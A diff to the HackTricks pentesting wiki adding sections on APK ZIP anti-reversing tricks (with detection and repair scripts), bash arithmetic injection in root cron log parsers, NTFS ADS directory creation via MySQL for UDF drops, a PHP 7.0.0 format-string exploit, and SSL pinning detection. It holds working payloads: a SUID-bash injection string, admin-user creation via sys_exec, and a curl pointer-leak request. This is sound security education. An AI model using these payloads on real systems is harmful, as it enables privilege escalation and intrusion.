HackTricks-wiki
diff --git a/‎src/SUMMARY.md‎
Lines changed: 1 addition & 0 deletions b/‎src/SUMMARY.md‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md‎
Lines changed: 160 additions & 3 deletions b/‎src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md‎
Lines changed: 160 additions & 3 deletions
diff --git a/‎src/linux-hardening/privilege-escalation/README.md‎
Lines changed: 26 additions & 1 deletion b/‎src/linux-hardening/privilege-escalation/README.md‎
Lines changed: 26 additions & 1 deletion
diff --git a/‎src/mobile-pentesting/android-app-pentesting/README.md‎
Lines changed: 59 additions & 0 deletions b/‎src/mobile-pentesting/android-app-pentesting/README.md‎
Lines changed: 59 additions & 0 deletions
diff --git a/‎src/network-services-pentesting/pentesting-mysql.md‎
Lines changed: 12 additions & 0 deletions b/‎src/network-services-pentesting/pentesting-mysql.md‎
Lines changed: 12 additions & 0 deletions
diff --git a/‎src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md‎
Lines changed: 27 additions & 4 deletions b/‎src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md‎
Lines changed: 27 additions & 4 deletions
@@ -236,6 +236,7 @@
 - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md)
 - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md)
 - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
+  - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
   - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
   - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
   - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)
 
@@ -14,11 +14,168 @@ The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestud
 
 It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data.
 
-## References
+---
 
-- [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
+## Anti-reversing tricks in APKs using manipulated ZIP headers
 
-{{#include ../../../banners/hacktricks-training.md}}
+Modern Android malware droppers use malformed ZIP metadata to break static tools (jadx/apktool/unzip) while keeping the APK installable on-device. The most common tricks are:
+
+- Fake encryption by setting the ZIP General Purpose Bit Flag (GPBF) bit 0
+- Abusing large/custom Extra fields to confuse parsers
+- File/directory name collisions to hide real artifacts (e.g., a directory named `classes.dex/` next to the real `classes.dex`)
+
+### 1) Fake encryption (GPBF bit 0 set) without real crypto
+
+Symptoms:
+- `jadx-gui` fails with errors like:
+  
+  ```
+  java.util.zip.ZipException: invalid CEN header (encrypted entry)
+  ```
+- `unzip` prompts for a password for core APK files even though a valid APK cannot have encrypted `classes*.dex`, `resources.arsc`, or `AndroidManifest.xml`:
+  
+  ```bash
+  unzip sample.apk
+  [sample.apk] classes3.dex password:
+    skipping: classes3.dex                          incorrect password
+    skipping: AndroidManifest.xml/res/vhpng-xhdpi/mxirm.png  incorrect password
+    skipping: resources.arsc/res/domeo/eqmvo.xml            incorrect password
+    skipping: classes2.dex                          incorrect password
+  ```
+
+Detection with zipdetails:
+
+```bash
+zipdetails -v sample.apk | less
+```
+
+Look at the General Purpose Bit Flag for local and central headers. A telltale value is bit 0 set (Encryption) even for core entries:
+
+```
+Extract Zip Spec      2D '4.5'
+General Purpose Flag  0A09
+  [Bit 0]   1 'Encryption'
+  [Bits 1-2] 1 'Maximum Compression'
+  [Bit 3]   1 'Streamed'
+  [Bit 11]  1 'Language Encoding'
+```
+
+Heuristic: If an APK installs and runs on-device but core entries appear "encrypted" to tools, the GPBF was tampered with.
+
+Fix by clearing GPBF bit 0 in both Local File Headers (LFH) and Central Directory (CD) entries. Minimal byte-patcher:
+
+```python
+# gpbf_clear.py – clear encryption bit (bit 0) in ZIP local+central headers
+import struct, sys
+
+SIG_LFH = b"\x50\x4b\x03\x04"  # Local File Header
+SIG_CDH = b"\x50\x4b\x01\x02"  # Central Directory Header
+
+def patch_flags(buf: bytes, sig: bytes, flag_off: int):
+    out = bytearray(buf)
+    i = 0
+    patched = 0
+    while True:
+        i = out.find(sig, i)
+        if i == -1:
+            break
+        flags, = struct.unpack_from('<H', out, i + flag_off)
+        if flags & 1:  # encryption bit set
+            struct.pack_into('<H', out, i + flag_off, flags & 0xFFFE)
+            patched += 1
+        i += 4  # move past signature to continue search
+    return bytes(out), patched
+
+if __name__ == '__main__':
+    inp, outp = sys.argv[1], sys.argv[2]
+    data = open(inp, 'rb').read()
+    data, p_lfh = patch_flags(data, SIG_LFH, 6)  # LFH flag at +6
+    data, p_cdh = patch_flags(data, SIG_CDH, 8)  # CDH flag at +8
+    open(outp, 'wb').write(data)
+    print(f'Patched: LFH={p_lfh}, CDH={p_cdh}')
+```
+
+Usage:
+
+```bash
+python3 gpbf_clear.py obfuscated.apk normalized.apk
+zipdetails -v normalized.apk | grep -A2 "General Purpose Flag"
+```
+
+You should now see `General Purpose Flag  0000` on core entries and tools will parse the APK again.
+
+### 2) Large/custom Extra fields to break parsers
+
+Attackers stuff oversized Extra fields and odd IDs into headers to trip decompilers. In the wild you may see custom markers (e.g., strings like `JADXBLOCK`) embedded there.
 
+Inspection:
 
+```bash
+zipdetails -v sample.apk | sed -n '/Extra ID/,+4p' | head -n 50
+```
+
+Examples observed: unknown IDs like `0xCAFE` ("Java Executable") or `0x414A` ("JA:") carrying large payloads.
+
+DFIR heuristics:
+- Alert when Extra fields are unusually large on core entries (`classes*.dex`, `AndroidManifest.xml`, `resources.arsc`).
+- Treat unknown Extra IDs on those entries as suspicious.
+
+Practical mitigation: rebuilding the archive (e.g., re-zipping extracted files) strips malicious Extra fields. If tools refuse to extract due to fake encryption, first clear GPBF bit 0 as above, then repackage:
+
+```bash
+mkdir /tmp/apk
+unzip -qq normalized.apk -d /tmp/apk
+(cd /tmp/apk && zip -qr ../clean.apk .)
+```
+
+### 3) File/Directory name collisions (hiding real artifacts)
+
+A ZIP can contain both a file `X` and a directory `X/`. Some extractors and decompilers get confused and may overlay or hide the real file with a directory entry. This has been observed with entries colliding with core APK names like `classes.dex`.
+
+Triage and safe extraction:
+
+```bash
+# List potential collisions (names that differ only by trailing slash)
+zipinfo -1 sample.apk | awk '{n=$0; sub(/\/$/,"",n); print n}' | sort | uniq -d
+
+# Extract while preserving the real files by renaming on conflict
+unzip normalized.apk -d outdir
+# When prompted:
+# replace outdir/classes.dex? [y]es/[n]o/[A]ll/[N]one/[r]ename: r
+# new name: unk_classes.dex
+```
+
+Programmatic detection post-fix:
+
+```python
+from zipfile import ZipFile
+from collections import defaultdict
+
+with ZipFile('normalized.apk') as z:
+    names = z.namelist()
+
+collisions = defaultdict(list)
+for n in names:
+    base = n[:-1] if n.endswith('/') else n
+    collisions[base].append(n)
+
+for base, variants in collisions.items():
+    if len(variants) > 1:
+        print('COLLISION', base, '->', variants)
+```
+
+Blue-team detection ideas:
+- Flag APKs whose local headers mark encryption (GPBF bit 0 = 1) yet install/run.
+- Flag large/unknown Extra fields on core entries (look for markers like `JADXBLOCK`).
+- Flag path-collisions (`X` and `X/`) specifically for `AndroidManifest.xml`, `resources.arsc`, `classes*.dex`.
+
+---
+
+## References
+
+- [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
+- [GodFather – Part 1 – A multistage dropper (APK ZIP anti-reversing)](https://shindan.io/blog/godfather-part-1-a-multistage-dropper)
+- [zipdetails (Archive::Zip script)](https://metacpan.org/pod/distribution/Archive-Zip/scripts/zipdetails)
+- [ZIP File Format Specification (PKWARE APPNOTE.TXT)](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)
 
+{{#include ../../../banners/hacktricks-training.md}}
@@ -416,6 +416,30 @@ Read the following page for more wildcard exploitation tricks:
 wildcards-spare-tricks.md
 {{#endref}}
 
+
+### Bash arithmetic expansion injection in cron log parsers
+
+Bash performs parameter expansion and command substitution before arithmetic evaluation in ((...)), $((...)) and let. If a root cron/parser reads untrusted log fields and feeds them into an arithmetic context, an attacker can inject a command substitution $(...) that executes as root when the cron runs.
+
+- Why it works: In Bash, expansions occur in this order: parameter/variable expansion, command substitution, arithmetic expansion, then word splitting and pathname expansion. So a value like `$(/bin/bash -c 'id > /tmp/pwn')0` is first substituted (running the command), then the remaining numeric `0` is used for the arithmetic so the script continues without errors.
+
+- Typical vulnerable pattern:
+  ```bash
+  #!/bin/bash
+  # Example: parse a log and "sum" a count field coming from the log
+  while IFS=',' read -r ts user count rest; do
+      # count is untrusted if the log is attacker-controlled
+      (( total += count ))     # or: let "n=$count"
+  done < /var/www/app/log/application.log
+  ```
+
+- Exploitation: Get attacker-controlled text written into the parsed log so that the numeric-looking field contains a command substitution and ends with a digit. Ensure your command does not print to stdout (or redirect it) so the arithmetic remains valid.
+  ```bash
+  # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim):
+  $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0
+  # When the root cron parser evaluates (( total += count )), your command runs as root.
+  ```
+
 ### Cron script overwriting and symlink
 
 If you **can modify a cron script** executed by root, you can get a shell very easily:
@@ -1682,6 +1706,7 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 - [https://linuxconfig.org/how-to-manage-acls-on-linux](https://linuxconfig.org/how-to-manage-acls-on-linux)
 - [https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
 - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/)
-
+- [0xdf – HTB Eureka (bash arithmetic injection via logs, overall chain)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
+- [GNU Bash Reference Manual – Shell Arithmetic](https://www.gnu.org/software/bash/manual/bash.html#Shell-Arithmetic)
 
 {{#include ../../banners/hacktricks-training.md}}
@@ -444,6 +444,62 @@ Applications targeting **API Level 24 and above** require modifications to the N
 
 If **Flutter** is being used you need to to follow the instructions in [**this page**](flutter.md). This is becasue, just adding the certificate into the store won't work as Flutter has its own list of valid CAs.
 
+#### Static detection of SSL/TLS pinning
+
+Before attempting runtime bypasses, quickly map where pinning is enforced in the APK. Static discovery helps you plan hooks/patches and focus on the right code paths.
+
+Tool: SSLPinDetect
+- Open-source static-analysis utility that decompiles the APK to Smali (via apktool) and scans for curated regex patterns of SSL/TLS pinning implementations.
+- Reports exact file path, line number, and a code snippet for each match.
+- Covers common frameworks and custom code paths: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, and Network Security Config XML pins.
+
+Install
+- Prereqs: Python >= 3.8, Java on PATH, apktool
+
+```bash
+git clone https://github.com/aancw/SSLPinDetect
+cd SSLPinDetect
+pip install -r requirements.txt
+```
+
+Usage
+```bash
+# Basic
+python sslpindetect.py -f app.apk -a apktool.jar
+
+# Verbose (timings + per-match path:line + snippet)
+python sslpindetect.py -a apktool_2.11.0.jar -f sample/app-release.apk -v
+```
+
+Example pattern rules (JSON)
+Use or extend signatures to detect proprietary/custom pinning styles. You can load your own JSON and scan at scale.
+
+```json
+{
+  "OkHttp Certificate Pinning": [
+    "Lcom/squareup/okhttp/CertificatePinner;",
+    "Lokhttp3/CertificatePinner;",
+    "setCertificatePinner"
+  ],
+  "TrustManager Override": [
+    "Ljavax/net/ssl/X509TrustManager;",
+    "checkServerTrusted"
+  ]
+}
+```
+
+Notes and tips
+- Fast scanning on large apps via multi-threading and memory-mapped I/O; pre-compiled regex reduces overhead/false positives.
+- Pattern collection: https://github.com/aancw/smali-sslpin-patterns
+- Typical detection targets to triage next:
+  - OkHttp: CertificatePinner usage, setCertificatePinner, okhttp3/okhttp package references
+  - Custom TrustManagers: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
+  - Custom SSL contexts: SSLContext.getInstance + SSLContext.init with custom managers
+  - Declarative pins in res/xml network security config and manifest references
+- Use the matched locations to plan Frida hooks, static patches, or config reviews before dynamic testing.
+
+
+
 #### Bypassing SSL Pinning
 
 When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Various methods are available for this purpose:
@@ -799,6 +855,9 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
 - [https://manifestsecurity.com/android-application-security/](https://manifestsecurity.com/android-application-security/)
 - [https://github.com/Ralireza/Android-Security-Teryaagh](https://github.com/Ralireza/Android-Security-Teryaagh)
 - [https://www.youtube.com/watch?v=PMKnPaGWxtg\&feature=youtu.be\&ab_channel=B3nacSec](https://www.youtube.com/watch?v=PMKnPaGWxtg&feature=youtu.be&ab_channel=B3nacSec)
+- [SSLPinDetect: Advanced SSL Pinning Detection for Android Security Analysis](https://petruknisme.medium.com/sslpindetect-advanced-ssl-pinning-detection-for-android-security-analysis-1390e9eca097)
+- [SSLPinDetect GitHub](https://github.com/aancw/SSLPinDetect)
+- [smali-sslpin-patterns](https://github.com/aancw/smali-sslpin-patterns)
 
 ## Yet to try
 
 
@@ -289,6 +289,17 @@ SELECT sys_exec("net user npn npn12345678 /add");
 SELECT sys_exec("net localgroup Administrators npn /add");
 ```
 
+#### Windows tip: create directories with NTFS ADS from SQL
+
+On NTFS you can coerce directory creation using an alternate data stream even when only a file write primitive exists. If the classic UDF chain expects a `plugin` directory but it doesn’t exist and `@@plugin_dir` is unknown or locked down, you can create it first with `::$INDEX_ALLOCATION`:
+
+```sql
+SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
+-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory
+```
+
+This turns limited `SELECT ... INTO OUTFILE` into a more complete primitive on Windows stacks by bootstrapping the folder structure needed for UDF drops.
+
 ### Extracting MySQL credentials from files
 
 Inside _/etc/mysql/debian.cnf_ you can find the **plain-text password** of the user **debian-sys-maint**
@@ -749,6 +760,7 @@ john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist
 - [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
 - [Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)](https://security.snyk.io/vuln/SNYK-JAVA-COMMYSQL-5441540)
 - [mysql-fake-server – Rogue MySQL server for JDBC client attacks](https://github.com/4ra1n/mysql-fake-server)
+- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 
 
 
 
@@ -1,4 +1,4 @@
-# PHP - RCE abusing object creation: new $\_GET\["a"]\($\_GET\["b"])
+# PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])
 
 {{#include ../../../banners/hacktricks-training.md}}
 
@@ -97,11 +97,34 @@ It's noted that PHP temporarily stores uploaded files in `/tmp/phpXXXXXX`. The V
 
 A method described in the [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) involves uploading files that trigger a server crash before deletion. By brute-forcing the name of the temporary file, it becomes possible for Imagick to execute arbitrary PHP code. However, this technique was found to be effective only in an outdated version of ImageMagick.
 
-## References
+## Format-string in class-name resolution (PHP 7.0.0 Bug #71105)
 
-- [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
+When user input controls the class name (e.g., `new $_GET['model']()`), PHP 7.0.0 introduced a transient bug during the `Throwable` refactor where the engine mistakenly treated the class name as a printf format string during resolution. This enables classic printf-style primitives inside PHP: leaks with `%p`, write-count control with width specifiers, and arbitrary writes with `%n` against in-process pointers (for example, GOT entries on ELF builds).
 
-{{#include ../../../banners/hacktricks-training.md}}
+Minimal repro vulnerable pattern:
+
+```php
+<?php
+$model = $_GET['model'];
+$object = new $model();
+```
+
+Exploitation outline (from the reference):
+- Leak addresses via `%p` in the class name to find a writable target:
+  ```bash
+  curl "http://host/index.php?model=%p-%p-%p"
+  # Fatal error includes resolved string with leaked pointers
+  ```
+- Use positional parameters and width specifiers to set an exact byte-count, then `%n` to write that value to an address reachable on the stack, aiming at a GOT slot (e.g., `free`) to partially overwrite it to `system`.
+- Trigger the hijacked function by passing a class name containing a shell pipe to reach `system("id")`.
 
+Notes:
+- Works only on PHP 7.0.0 (Bug [#71105](https://bugs.php.net/bug.php?id=71105)); fixed in subsequent releases. Severity: critical if arbitrary class instantiation exists.
+- Typical payloads chain many `%p` to walk the stack, then `%.<width>d%<pos>$n` to land the partial overwrite.
 
+## References
+
+- [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
+- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
 
+{{#include ../../../banners/hacktricks-training.md}}